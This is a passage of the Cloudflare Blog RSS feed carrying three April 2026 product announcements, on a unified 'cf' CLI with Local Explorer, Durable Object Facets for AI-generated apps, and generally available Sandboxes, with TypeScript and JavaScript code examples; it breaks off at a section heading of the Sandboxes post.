
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Mon, 13 Apr 2026 16:55:04 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Building a CLI for all of Cloudflare]]></title>
            <link>https://blog.cloudflare.com/cf-cli-local-explorer/</link>
            <pubDate>Mon, 13 Apr 2026 14:29:45 GMT</pubDate>
            <description><![CDATA[ We’re introducing cf, a new unified CLI designed for consistency across the Cloudflare platform, alongside Local Explorer for debugging local data. These tools simplify how developers and AI agents interact with our nearly 3,000 API operations.
 ]]></description>
            <content:encoded><![CDATA[ <p>Cloudflare has a vast API surface. We have over 100 products, and nearly 3,000 HTTP API operations.</p><p>Increasingly, agents are the primary customer of our APIs. Developers bring their coding agents to build and deploy <a href="https://workers.cloudflare.com/solutions/frontends"><u>applications</u></a>, <a href="https://workers.cloudflare.com/solutions/ai"><u>agents</u></a>, and <a href="https://workers.cloudflare.com/solutions/platforms"><u>platforms</u></a> to Cloudflare, configure their account, and query our APIs for analytics and logs.</p><p>We want to make every Cloudflare product available in all of the ways agents need. For example, we now make Cloudflare’s entire API available in a single Code Mode MCP server that uses <a href="https://blog.cloudflare.com/code-mode-mcp/"><u>less than 1,000 tokens</u></a>. There’s a lot more surface area to cover, though: <a href="https://developers.cloudflare.com/workers/wrangler/commands/"><u>CLI commands</u></a>. <a href="https://blog.cloudflare.com/workers-environment-live-object-bindings/"><u>Workers Bindings</u></a> — including APIs for local development and testing. <a href="https://developers.cloudflare.com/fundamentals/api/reference/sdks/"><u>SDKs</u></a> across multiple languages. Our <a href="https://developers.cloudflare.com/workers/wrangler/configuration/"><u>configuration file</u></a>. <a href="https://developers.cloudflare.com/terraform/"><u>Terraform</u></a>. <a href="https://developers.cloudflare.com/"><u>Developer docs</u></a>. <a href="https://developers.cloudflare.com/api/"><u>API docs</u></a> and OpenAPI schemas. <a href="https://github.com/cloudflare/skills"><u>Agent Skills</u></a>.</p><p>Today, many of our products aren’t available across every one of these interfaces. This is particularly true of our CLI — <a href="https://developers.cloudflare.com/workers/wrangler/"><u>Wrangler</u></a>. Many Cloudflare products have no CLI commands in Wrangler. And agents love CLIs.</p><p>So we’ve been rebuilding Wrangler CLI, to make it the CLI for all of Cloudflare. It provides commands for all Cloudflare products, and lets you configure them together using infrastructure-as-code.</p><p>Today we’re sharing an early version of what the next version of Wrangler will look like as a technical preview. It’s very early, but we get the best feedback when we work in public.</p><p>You can try the Technical Preview today by running <code>npx cf</code>. Or you can install it globally by running <code>npm install -g cf</code>.</p><p>Right now, cf provides commands for just a small subset of Cloudflare products. We’re already testing a version of cf that supports the entirety of the Cloudflare API surface — and we will be intentionally reviewing and tuning the commands for each product, to have output that is ergonomic for both agents and humans. To be clear, this Technical Preview is just a small piece of the future Wrangler CLI. Over the coming months we will bring this together with the parts of Wrangler you know and love.</p><p>To build this in a way that keeps in sync with the rapid pace of product development at Cloudflare, we had to create a new system that allows us to generate commands, configuration, binding APIs, and more.</p>
    <div>
      <h2>Rethinking schemas and our code generation pipeline from first principles</h2>
      <a href="#rethinking-schemas-and-our-code-generation-pipeline-from-first-principles">
        
      </a>
    </div>
    <p>We already generate the Cloudflare <a href="https://blog.cloudflare.com/lessons-from-building-an-automated-sdk-pipeline/"><u>API SDKs</u></a>, <a href="https://blog.cloudflare.com/automatically-generating-cloudflares-terraform-provider/"><u>Terraform provider</u></a>, and <a href="https://blog.cloudflare.com/code-mode-mcp/"><u>Code Mode MCP server</u></a> based on the OpenAPI schema for Cloudflare API. But updating our CLI, Workers Bindings, wrangler.jsonc configuration, Agent Skills, dashboard and docs is still a manual process. This was already error-prone, required too much back and forth, and wouldn’t scale to support the whole Cloudflare API in the next version of our CLI.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2wjmgUzBkjeI0RtyXKIMXm/f7fc6ce3b7323aacb3babdfb461f383f/BLOG-3224_2.png" />
          </figure><p>To do this, we needed more than could be expressed in an OpenAPI schema. OpenAPI schemas describe REST APIs, but we have interactive CLI commands that involve multiple actions that combine both local development and API requests, Workers bindings expressed as RPC APIs, along with Agent Skills and documentation that ties this all together.</p><p>We write a lot of TypeScript at Cloudflare. It’s the lingua franca of software engineering. And we keep finding that it just works better to express APIs in TypeScript — as we do with <a href="https://blog.cloudflare.com/capnweb-javascript-rpc-library/"><u>Cap n’ Web</u></a>, <a href="https://blog.cloudflare.com/code-mode/"><u>Code Mode</u></a>, and the <a href="https://developers.cloudflare.com/workers/runtime-apis/rpc/"><u>RPC system</u></a> built into the Workers platform.</p><p>So we introduced a new TypeScript schema that can define the full scope of APIs, CLI commands and arguments, and context needed to generate any interface. The schema format is “just” a set of TypeScript types with conventions, linting, and guardrails to ensure consistency. But because it is our own format, it can easily be adapted to support any interface we need, today or in the future, while still <i>also</i> being able to generate an OpenAPI schema:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4H0xSIPMmrixUWsFL86RUJ/998b93a465d26d856885b4d833ac19d4/BLOG-3224_3.png" />
          </figure><p>To date most of our focus has been at this layer — building the machine we needed, so that we can now start building the CLI and other interfaces we’ve wanted for years to be able to provide. This lets us start to dream bigger about what we could standardize across Cloudflare and make better for Agents — especially when it comes to context engineering our CLI.</p>
    <div>
      <h2>Agents and CLIs — consistency and context engineering</h2>
      <a href="#agents-and-clis-consistency-and-context-engineering">
        
      </a>
    </div>
    <p>Agents expect CLIs to be consistent. If one command uses <code>&lt;command&gt; info</code> as the syntax for getting information about a resource, and another uses <code>&lt;command&gt; get</code>, the agent will expect one and call a non-existent command for the other. In a large engineering org of hundreds or thousands of people, and with many products, manually enforcing consistency through reviews is Swiss cheese. And you can enforce it at the CLI layer, but then naming differs between the CLI, REST API and SDKs, making the problem arguably worse.</p><p>One of the first things we’ve done is to start creating rules and guardrails, enforced at the schema layer. It’s always <code>get</code>, never <code>info</code>. Always <code>--force</code>, never <code>--skip-confirmations</code>. Always <code>--json</code>, never <code>--format</code>, and always supported across commands. </p><p>Wrangler CLI is also fairly unique — it provides commands and configuration that can work with both simulated local resources, or remote resources, like <a href="https://developers.cloudflare.com/d1/"><u>D1 databases</u></a>, <a href="https://developers.cloudflare.com/r2"><u>R2 storage buckets</u></a>, and <a href="https://developers.cloudflare.com/kv"><u>KV namespaces</u></a>. This means consistent defaults matter even more. If an agent thinks it’s modifying a remote database, but is actually adding records to local database, and the developer is using remote bindings to develop locally against a remote database, their agent won’t understand why the newly-added records aren’t showing up when the agent makes a request to the local dev server. Consistent defaults, along with output that clearly signals whether commands are applied to remote or local resources, ensure agents have explicit guidance.</p>
    <div>
      <h2>Local Explorer — what you can do remotely, you can now do locally</h2>
      <a href="#local-explorer-what-you-can-do-remotely-you-can-now-do-locally">
        
      </a>
    </div>
    <p>Today we are also releasing Local Explorer, a new feature available in open beta in both Wrangler and the Cloudflare Vite plugin.</p><p>Local Explorer lets you introspect the simulated resources that your Worker uses when you are developing locally, including <a href="https://www.cloudflare.com/developer-platform/products/workers-kv/"><u>KV</u></a>, <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a>, D1, <a href="https://www.cloudflare.com/developer-platform/products/durable-objects/"><u>Durable Objects</u></a> and <a href="https://www.cloudflare.com/developer-platform/products/workflows/"><u>Workflows</u></a>. The same things you can do via the Cloudflare API and Dashboard with each of these, you can also do entirely locally, powered by the same underlying API structure.</p><p>For years we’ve <a href="https://blog.cloudflare.com/wrangler3/"><u>made a bet on fully local development</u></a> — not just for Cloudflare Workers, but for the entire platform. When you use D1, even though D1 is a hosted, serverless database product, you can run your database and communicate with it via bindings entirely locally, without any extra setup or tooling. Via <a href="https://developers.cloudflare.com/workers/testing/miniflare/"><u>Miniflare</u></a>, our local development platform emulator, the Workers runtime provides the exact same APIs in local dev as in production, and uses a local SQLite database to provide the same functionality. This makes it easy to write and run tests that run fast, without the need for network access, and work offline.</p><p>But until now, working out what data was stored locally required you to reverse engineer, introspect the contents of the <code>.wrangler/state</code> directory, or install third-party tools.</p><p>Now whenever you run an app with Wrangler CLI or the Cloudflare Vite plugin, you will be prompted to open the local explorer (keyboard shortcut <code>e</code>). This provides you with a simple, local interface to see what bindings your Worker currently has attached, and what data is stored against them.</p><div>
  
</div><p>When you build using Agents, Local Explorer is a great way to understand what the agent is doing with data, making the local development cycle much more interactive. You can turn to Local Explorer anytime you need to verify a schema, seed some test records, or just start over and <code>DROP TABLE</code>.</p><p>Our goal here is to provide a mirror of the Cloudflare API that only modifies local data, so that all of your local resources are available via the same APIs that you use remotely. And by making the API shape match across local and remote, when you run CLI commands in the upcoming version of the CLI and pass a <code>--local</code> flag, the commands just work. The only difference is that the command makes a request to this local mirror of the Cloudflare API instead.</p><p>Starting today, this API is available at <code>/cdn-cgi/explorer/api</code> on any Wrangler- or Vite Plugin- powered application. By pointing your agent at this address, it will find an OpenAPI specification to be able to manage your local resources for you, just by talking to your agent.</p>
    <div>
      <h2>Tell us your hopes and dreams for a Cloudflare-wide CLI </h2>
      <a href="#tell-us-your-hopes-and-dreams-for-a-cloudflare-wide-cli">
        
      </a>
    </div>
    <p>Now that we have built the machine, it’s time to take the best parts of Wrangler today, combine them with what’s now possible, and make Wrangler the best CLI possible for using all of Cloudflare.</p><p>You can try the technical preview today by running <code>npx cf</code>. Or you can install it globally by running npm <code>install -g cf</code>.</p><p>With this very early version, we want your feedback — not just about what the technical preview does today, but what you want from a CLI for Cloudflare’s entire platform. Tell us what you wish was an easy one-line CLI command but takes a few clicks in our dashboard today. What you wish you could configure in <code>wrangler.jsonc</code> — like DNS records or Cache Rules. And where you’ve seen your agents get stuck, and what commands you wish our CLI provided for your agent to use.</p><p>Jump into the <a href="https://discord.cloudflare.com/"><u>Cloudflare Developers Discord</u></a> and tell us what you’d like us to add first to the CLI, and stay tuned for many more updates soon.</p><p><i>Thanks to Emily Shen for her valuable contributions to kicking off the Local Explorer project.</i></p> ]]></content:encoded>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[D1]]></category>
            <category><![CDATA[API]]></category>
            <category><![CDATA[Agents Week]]></category>
            <guid isPermaLink="false">5r3Nx1IDtp6B6GRDHqQyWL</guid>
            <dc:creator>Matt “TK” Taylor</dc:creator>
            <dc:creator>Dimitri Mitropoulos</dc:creator>
            <dc:creator>Dan Carter</dc:creator>
        </item>
        <item>
            <title><![CDATA[Durable Objects in Dynamic Workers: Give each AI-generated app its own database]]></title>
            <link>https://blog.cloudflare.com/durable-object-facets-dynamic-workers/</link>
            <pubDate>Mon, 13 Apr 2026 13:08:35 GMT</pubDate>
            <description><![CDATA[ We’re introducing Durable Object Facets, allowing Dynamic Workers to instantiate Durable Objects with their own isolated SQLite databases. This enables developers to build platforms that run persistent, stateful code generated on-the-fly.
 ]]></description>
            <content:encoded><![CDATA[ <p>A few weeks ago, we announced <a href="https://blog.cloudflare.com/dynamic-workers/"><u>Dynamic Workers</u></a>, a new feature of the Workers platform which lets you load Worker code on-the-fly into a secure sandbox. The Dynamic Worker Loader API essentially provides direct access to the basic compute isolation primitive that Workers has been based on all along: isolates, not containers. Isolates are much lighter-weight than containers, and as such, can load 100x faster using 1/10 the memory. They are so efficient, they can be treated as "disposable": start one up to run a few lines of code, then throw it away. Like a secure version of eval(). </p><p>Dynamic Workers have many uses. In the original announcement, we focused on how to use them to run AI-agent-generated code as an alternative to tool calls. In this use case, an AI agent performs actions at the request of a user by writing a few lines of code and executing them. The code is single-use, intended to perform one task one time, and is thrown away immediately after it executes.</p><p>But what if you want an AI to generate more persistent code? What if you want your AI to build a small application with a custom UI the user can interact with? What if you want that application to have long-lived state? But of course, you still want it to run in a secure sandbox.</p><p>One way to do this would be to use Dynamic Workers, and simply provide the Worker with an <a href="https://developers.cloudflare.com/workers/runtime-apis/rpc/"><u>RPC</u></a> API that gives it access to storage. Using <a href="https://developers.cloudflare.com/dynamic-workers/usage/bindings/"><u>bindings</u></a>, you could give the Dynamic Worker an API that points back to your remote SQL database (perhaps backed by <a href="https://developers.cloudflare.com/d1/"><u>Cloudflare D1</u></a>, or a Postgres database you access through <a href="https://developers.cloudflare.com/hyperdrive/"><u>Hyperdrive</u></a> — it's up to you).</p><p>But Workers also has a unique and extremely fast type of storage that may be a perfect fit for this use case: <a href="https://developers.cloudflare.com/durable-objects/"><u>Durable Objects</u></a>. A Durable Object is a special kind of Worker that has a unique name, with one instance globally per name. That instance has a SQLite database attached, which lives <i>on local disk</i> on the machine where the Durable Object runs. This makes storage access ridiculously fast: there is effectively <a href="https://blog.cloudflare.com/sqlite-in-durable-objects/"><u>zero latency</u></a>.</p><p>Perhaps, then, what you really want is for your AI to write code for a Durable Object, and then you want to run that code in a Dynamic Worker.</p>
    <div>
      <h2><b>But how?</b></h2>
      <a href="#but-how">
        
      </a>
    </div>
    <p>This presents a weird problem. Normally, to use Durable Objects you have to:</p><ol><li><p>Write a class extending <code>DurableObject</code>.</p></li><li><p>Export it from your Worker's main module.</p></li><li><p><a href="https://developers.cloudflare.com/durable-objects/get-started/#5-configure-durable-object-class-with-sqlite-storage-backend"><u>Specify in your Wrangler config</u></a> that storage should be provision for this class. This creates a Durable Object namespace that points at your class for handling incoming requests.</p></li><li><p><a href="https://developers.cloudflare.com/durable-objects/get-started/#4-configure-durable-object-bindings"><u>Declare a Durable Object namespace binding</u></a> pointing at your namespace (or use <a href="https://developers.cloudflare.com/workers/runtime-apis/context/#exports"><u>ctx.exports</u></a>), and use it to make requests to your Durable Object.</p></li></ol><p>This doesn't extend naturally to Dynamic Workers. First, there is the obvious problem: The code is dynamic. You run it without invoking the Cloudflare API at all. But Durable Object storage has to be provisioned through the API, and the namespace has to point at an implementing class. It can't point at your Dynamic Worker.</p><p>But there is a deeper problem: Even if you could somehow configure a Durable Object namespace to point directly at a Dynamic Worker, would you want to? Do you want your agent (or user) to be able to create a whole namespace full of Durable Objects? To use unlimited storage spread around the world?</p><p>You probably don't. You probably want some control. You may want to limit, or at least track, how many objects they create. Maybe you want to limit them to just one object (probably good enough for vibe-coded personal apps). You may want to add logging and other observability. Metrics. Billing. Etc.</p><p>To do all this, what you really want is for requests to these Durable Objects to go to <i>your</i> code <i>first</i>, where you can then do all the "logistics", and <i>then</i> forward the request into the agent's code. You want to write a <i>supervisor</i> that runs as part of every Durable Object.</p>
    <div>
      <h2><b>Solution: Durable Object Facets</b></h2>
      <a href="#solution-durable-object-facets">
        
      </a>
    </div>
    <p>Today we are releasing, in open beta, a feature that solves this problem.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/mUUk7svflWvIp5Ff3npbG/cd2ec9a7111681657c37e3560fd9af58/BLOG-3211_2.png" />
          </figure><p><a href="https://developers.cloudflare.com/dynamic-workers/usage/durable-object-facets/"><u>Durable Object Facets</u></a> allow you to load and instantiate a Durable Object class dynamically, while providing it with a SQLite database to use for storage. With Facets:</p><ul><li><p>First you create a normal Durable Object namespace, pointing to a class <i>you</i> write.</p></li><li><p>In that class, you load the agent's code as a Dynamic Worker, and call into it.</p></li><li><p>The Dynamic Worker's code can implement a Durable Object class directly. That is, it literally exports a class declared as <code>extends DurableObject</code>.</p></li><li><p>You are instantiating that class as a "facet" of your own Durable Object.</p></li><li><p>The facet gets its own SQLite database, which it can use via the normal Durable Object storage APIs. This database is separate from the supervisor's database, but the two are stored together as part of the same overall Durable Object.</p></li></ul>
    <div>
      <h2><b>How it works</b></h2>
      <a href="#how-it-works">
        
      </a>
    </div>
    <p>Here is a simple, complete implementation of an app platform that dynamically loads and runs a Durable Object class:</p>
            <pre><code>import { DurableObject } from "cloudflare:workers";

// For the purpose of this example, we'll use this static
// application code, but in the real world this might be generated
// by AI (or even, perhaps, a human user).
const AGENT_CODE = `
  import { DurableObject } from "cloudflare:workers";

  // Simple app that remembers how many times it has been invoked
  // and returns it.
  export class App extends DurableObject {
    fetch(request) {
      // We use storage.kv here for simplicity, but storage.sql is
      // also available. Both are backed by SQLite.
      let counter = this.ctx.storage.kv.get("counter") || 0;
      ++counter;
      this.ctx.storage.kv.put("counter", counter);

      return new Response("You've made " + counter + " requests.\\n");
    }
  }
`;

// AppRunner is a Durable Object you write that is responsible for
// dynamically loading applications and delivering requests to them.
// Each instance of AppRunner contains a different app.
export class AppRunner extends DurableObject {
  async fetch(request) {
    // We've received an HTTP request, which we want to forward into
    // the app.

    // The app itself runs as a child facet named "app". One Durable
    // Object can have any number of facets (subject to storage limits)
    // with different names, but in this case we have only one. Call
    // this.ctx.facets.get() to get a stub pointing to it.
    let facet = this.ctx.facets.get("app", async () =&gt; {
      // If this callback is called, it means the facet hasn't
      // started yet (or has hibernated). In this callback, we can
      // tell the system what code we want it to load.

      // Load the Dynamic Worker.
      let worker = this.#loadDynamicWorker();

      // Get the exported class we're interested in.
      let appClass = worker.getDurableObjectClass("App");

      return { class: appClass };
    });

    // Forward request to the facet.
    // (Alternatively, you could call RPC methods here.)
    return await facet.fetch(request);
  }

  // RPC method that a client can call to set the dynamic code
  // for this app.
  setCode(code) {
    // Store the code in the AppRunner's SQLite storage.
    // Each unique code must have a unique ID to pass to the
    // Dynamic Worker Loader API, so we generate one randomly.
    this.ctx.storage.kv.put("codeId", crypto.randomUUID());
    this.ctx.storage.kv.put("code", code);
  }

  #loadDynamicWorker() {
    // Use the Dynamic Worker Loader API like normal. Use get()
    // rather than load() since we may load the same Worker many
    // times.
    let codeId = this.ctx.storage.kv.get("codeId");
    return this.env.LOADER.get(codeId, async () =&gt; {
      // This Worker hasn't been loaded yet. Load its code from
      // our own storage.
      let code = this.ctx.storage.kv.get("code");

      return {
        compatibilityDate: "2026-04-01",
        mainModule: "worker.js",
        modules: { "worker.js": code },
        globalOutbound: null,  // block network access
      }
    });
  }
}

// This is a simple Workers HTTP handler that uses AppRunner.
export default {
  async fetch(req, env, ctx) {
    // Get the instance of AppRunner named "my-app".
    // (Each name has exactly one Durable Object instance in the
    // world.)
    let obj = ctx.exports.AppRunner.getByName("my-app");

    // Initialize it with code. (In a real use case, you'd only
    // want to call this once, not on every request.)
    await obj.setCode(AGENT_CODE);

    // Forward the request to it.
    return await obj.fetch(req);
  }
}
</code></pre>
            <p>In this example:</p><ul><li><p><code>AppRunner</code> is a "normal" Durable Object written by the platform developer (you).</p></li><li><p>Each instance of <code>AppRunner</code> manages one application. It stores the app code and loads it on demand.</p></li><li><p>The application itself implements and exports a Durable Object class, which the platform expects is named <code>App</code>.</p></li><li><p><code>AppRunner</code> loads the application code using Dynamic Workers, and then executes the code as a Durable Object Facet.</p></li><li><p>Each instance of <code>AppRunner</code> is one Durable Object composed of <i>two</i> SQLite databases: one belonging to the parent (<code>AppRunner</code> itself) and one belonging to the facet (<code>App</code>). These databases are isolated: the application cannot read <code>AppRunner</code>'s database, only its own.</p></li></ul><p>To run the example, copy the code above into a file <code>worker.j</code>s, pair it with the following <code>wrangler.jsonc</code>, and run it locally with <code>npx wrangler dev</code>.</p>
            <pre><code>// wrangler.jsonc for the above sample worker.
{
  "compatibility_date": "2026-04-01",
  "main": "worker.js",
  "migrations": [
    {
      "tag": "v1",
      "new_sqlite_classes": [
        "AppRunner"
      ]
    }
  ],
  "worker_loaders": [
    {
      "binding": "LOADER",
    },
  ],
}
</code></pre>
            
    <div>
      <h2><b>Start building</b></h2>
      <a href="#start-building">
        
      </a>
    </div>
    <p>Facets are a feature of Dynamic Workers, available in beta immediately to users on the Workers Paid plan.</p><p>Check out the documentation to learn more about <a href="https://developers.cloudflare.com/dynamic-workers/"><u>Dynamic Workers</u></a> and <a href="https://developers.cloudflare.com/dynamic-workers/usage/durable-object-facets/"><u>Facets</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Agents Week]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Durable Objects]]></category>
            <category><![CDATA[Storage]]></category>
            <guid isPermaLink="false">2OYAJUdGLODlCXKKdCZMeG</guid>
            <dc:creator>Kenton Varda</dc:creator>
        </item>
        <item>
            <title><![CDATA[Agents have their own computers with Sandboxes GA]]></title>
            <link>https://blog.cloudflare.com/sandbox-ga/</link>
            <pubDate>Mon, 13 Apr 2026 13:08:35 GMT</pubDate>
            <description><![CDATA[ Cloudflare Sandboxes give AI agents a persistent, isolated environment: a real computer with a shell, a filesystem, and background processes that starts on demand and picks up exactly where it left off. ]]></description>
            <content:encoded><![CDATA[ <p>When we launched <a href="https://github.com/cloudflare/sandbox-sdk"><u>Cloudflare Sandboxes</u></a> last June, the premise was simple: <a href="https://www.cloudflare.com/learning/ai/what-is-agentic-ai/"><u>AI agents</u></a> need to develop and run code, and they need to do it somewhere safe.</p><p>If an agent is acting like a developer, this means cloning repositories, building code in many languages, running development servers, etc. To do these things effectively, they will often need a full computer (and if they don’t, they can <a href="https://blog.cloudflare.com/dynamic-workers/"><u>reach for something lightweight</u></a>!).</p><p>Many developers are stitching together solutions using VMs or existing container solutions, but there are lots of hard problems to solve:</p><ul><li><p><b>Burstiness -</b> With each session needing its own sandbox, you often need to spin up many sandboxes quickly, but you don’t want to pay for idle compute on standby.</p></li><li><p><b>Quick state restoration</b> - Each session should start quickly and re-start quickly, resuming past state.</p></li><li><p><b>Security</b> - Agents need to access services securely, but can’t be trusted with credentials.</p></li><li><p><b>Control</b> - It needs to be simple to programmatically control sandbox lifecycle, execute commands, handle files, and more.</p></li><li><p><b>Ergonomics</b> - You need to give a simple interface for both humans and agents to do common operations.</p></li></ul><p>We’ve spent time solving these issues so you don’t have to. Since our initial launch we’ve made Sandboxes an even better place to run agents at scale. We’ve worked with our initial partners such as Figma, who run agents in containers with <a href="https://www.figma.com/make/"><u>Figma Make</u></a>:</p><blockquote><p><i>“Figma Make is built to help builders and makers of all backgrounds go from idea to production, faster. To deliver on that goal, we needed an infrastructure solution that could provide reliable, highly-scalable sandboxes where we could run untrusted agent- and user-authored code. Cloudflare Containers is that solution.”</i></p><p><i>- </i><b><i>Alex Mullans</i></b><i>, AI and Developer Platforms at Figma</i></p></blockquote><p>We want to bring Sandboxes to even more great organizations, so today we are excited to announce that <b>Sandboxes and Cloudflare Containers are both generally available.</b></p><p>Let’s take a look at some of the recent changes to Sandboxes:</p><ul><li><p><b>Secure credential injection </b>lets you make authenticated calls without the agent ever having credential access  </p></li><li><p><b>PTY support</b> gives you and your agent a real terminal</p></li><li><p><b>Persistent code interpreters</b> give your agent a place to execute stateful Python, JavaScript, and TypeScript out of the box</p></li><li><p><b>Background processes and live preview URLs</b> provide a simple way to interact with development servers and verify in-flight changes</p></li><li><p><b>Filesystem watching</b> improves iteration speed as agents make changes</p></li><li><p><b>Snapshots</b> let you quickly recover an agent's coding session</p></li><li><p><b>Higher limits and Active CPU Pricing</b> let you deploy a fleet of agents at scale without paying for unused CPU cycles</p></li></ul>
    <div>
      <h2>Sandboxes 101</h2>
      <a href="#sandboxes-101">
        
      </a>
    </div>
    <p>Before getting into some of the recent changes, let’s quickly look at the basics.</p><p>A Cloudflare Sandbox is a persistent, isolated environment powered by <a href="https://blog.cloudflare.com/containers-are-available-in-public-beta-for-simple-global-and-programmable/"><u>Cloudflare Containers</u></a>. You ask for a sandbox by name. If it's running, you get it. If it's not, it starts. When it's idle, it sleeps automatically and wakes when it receives a request. It’s easy to programmatically interact with the sandbox using methods like <code>exec</code>, <code>gitClone</code>, <code>writeFile</code> and <a href="https://developers.cloudflare.com/sandbox/api/"><u>more</u></a>.</p>
            <pre><code>import { getSandbox } from "@cloudflare/sandbox";
export { Sandbox } from "@cloudflare/sandbox";

export default {
  async fetch(request: Request, env: Env) {
    // Ask for a sandbox by name. It starts on demand.
    const sandbox = getSandbox(env.Sandbox, "agent-session-47");

    // Clone a repository into it.
    await sandbox.gitCheckout("https://github.com/org/repo", {
      targetDir: "/workspace",
      depth: 1,
    });

    // Run the test suite. Stream output back in real time.
    return sandbox.exec("npm", ["test"], { stream: true });
  },
};
</code></pre>
            <p>As long as you provide the same ID, subsequent requests can get to this same sandbox from anywhere in the world.</p>
    <div>
      <h2>Secure credential injection</h2>
      <a href="#secure-credential-injection">
        
      </a>
    </div>
    <p>One of the hardest problems in agentic workloads is authentication. You often need agents to access private services, but you can't fully trust them with raw credentials. </p><p>Sandboxes solve this by injecting credentials at the network layer using a programmable egress proxy. This means that sandbox agents never have access to credentials and you can fully customize auth logic as you see fit:</p>
            <pre><code>class OpenCodeInABox extends Sandbox {
  static outboundByHost = {
    "my-internal-vcs.dev": (request, env, ctx) =&gt; {
      const headersWithAuth = new Headers(request.headers);
      headersWithAuth.set("x-auth-token", env.SECRET);
      return fetch(request, { headers: headersWithAuth });
    }
  }
}
</code></pre>
            <p>For a deep dive into how this works — including identity-aware credential injection, dynamically modifying rules, and integrating with <a href="https://developers.cloudflare.com/workers/runtime-apis/bindings/"><u>Workers bindings</u></a> — read our recent blog post on <a href="https://blog.cloudflare.com/sandbox-auth"><u>Sandbox auth</u></a>.</p>
    <div>
      <h2>A real terminal, not a simulation</h2>
      <a href="#a-real-terminal-not-a-simulation">
        
      </a>
    </div>
    <p>Early agent systems often modeled shell access as a request-response loop: run a command, wait for output, stuff the transcript back into the prompt, repeat. It works, but it is not how developers actually use a terminal. </p><p>Humans run something, watch output stream in, interrupt it, reconnect later, and keep going. Agents benefit from that same feedback loop.</p><p>In February, we shipped PTY support. A pseudo-terminal session in a Sandbox, proxied over WebSocket, compatible with <a href="https://xtermjs.org/"><u>xterm.js</u></a>.</p><p>Just call <code>sandbox.terminal</code> to serve the backend:</p>
            <pre><code>// Worker: upgrade a WebSocket connection into a live terminal session
export default {
  async fetch(request: Request, env: Env) {
    const url = new URL(request.url);
    if (url.pathname === "/terminal") {
      const sandbox = getSandbox(env.Sandbox, "my-session");
      return sandbox.terminal(request, { cols: 80, rows: 24 });
    }
    return new Response("Not found", { status: 404 });
  },
};

</code></pre>
            <p>And use <code>xterm addon</code> to call it from the client:</p>
            <pre><code>// Browser: connect xterm.js to the sandbox shell
import { Terminal } from "xterm";
import { SandboxAddon } from "@cloudflare/sandbox/xterm";

const term = new Terminal();
const addon = new SandboxAddon({
  getWebSocketUrl: ({ origin }) =&gt; `${origin}/terminal`,
});

term.loadAddon(addon);
term.open(document.getElementById("terminal-container")!);
addon.connect({ sandboxId: "my-session" });
</code></pre>
            <p>This allows agents and developers to use a full PTY to debug those sessions live.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3bgyxh8kg3MPfij2v1XXLE/9cff50318ad306b20c3346c3bd3554d9/BLOG-3264_2.gif" />
          </figure><p>Each terminal session gets its own isolated shell, its own working directory, its own environment. Open as many as you need, just like you would on your own machine. Output is buffered server-side, so reconnecting replays what you missed.</p>
    <div>
      <h2>A code interpreter that remembers</h2>
      <a href="#a-code-interpreter-that-remembers">
        
      </a>
    </div>
    <p>For data analysis, scripting, and exploratory workflows, we also ship a higher-level abstraction: a persistent code execution context.</p><p>The key word is “persistent.” Many code interpreter implementations run each snippet in isolation, so state disappears between calls. You can't set a variable in one step and read it in the next.</p><p>Sandboxes allow you to create “contexts” that persist state. Variables and imports persist across calls the same way they would in a Jupyter notebook:</p>
            <pre><code>// Create a Python context. State persists for its lifetime.
const ctx = await sandbox.createCodeContext({ language: "python" });

// First execution: load data
await sandbox.runCode(`
  import pandas as pd
  df = pd.read_csv('/workspace/sales.csv')
  df['margin'] = (df['revenue'] - df['cost']) / df['revenue']
`, { context: ctx });

// Second execution: df is still there
const result = await sandbox.runCode(`
  df.groupby('region')['margin'].mean().sort_values(ascending=False)
`, { context: ctx, onStdout: (line) =&gt; console.log(line.text) });

// result contains matplotlib charts, structured json output, and Pandas tables in HTML
</code></pre>
            
    <div>
      <h2>Start a server. Get a URL. Ship it.</h2>
      <a href="#start-a-server-get-a-url-ship-it">
        
      </a>
    </div>
    <p>Agents are more useful when they can build something and show it to the user immediately. Sandboxes support background processes, readiness checks, and <a href="https://developers.cloudflare.com/sandbox/concepts/preview-urls/"><u>preview URLs</u></a>. This lets an agent start a development server and share a live link without leaving the conversation.</p>
            <pre><code>// Start a dev server as a background process
const server = await sandbox.startProcess("npm run dev", {
  cwd: "/workspace",
});

// Wait until the server is actually ready — don't just sleep and hope
await server.waitForLog(/Local:.*localhost:(\d+)/);

// Expose the running service with a public URL
const { url } = await sandbox.exposePort(3000);

// url is a live public URL the agent can share with the user
console.log(`Preview: ${url}`);
</code></pre>
            <p>With <code><i>waitForPort()</i></code> and <code><i>waitForLog()</i></code>, agents can sequence work based on real signals from the running program instead of guesswork. This is much nicer than a common alternative, which is usually some version of <code>sleep(2000)</code> followed by hope.</p>
    <div>
      <h2>Watch the file system and react immediately</h2>
      <a href="#watch-the-file-system-and-react-immediately">
        
      </a>
    </div>
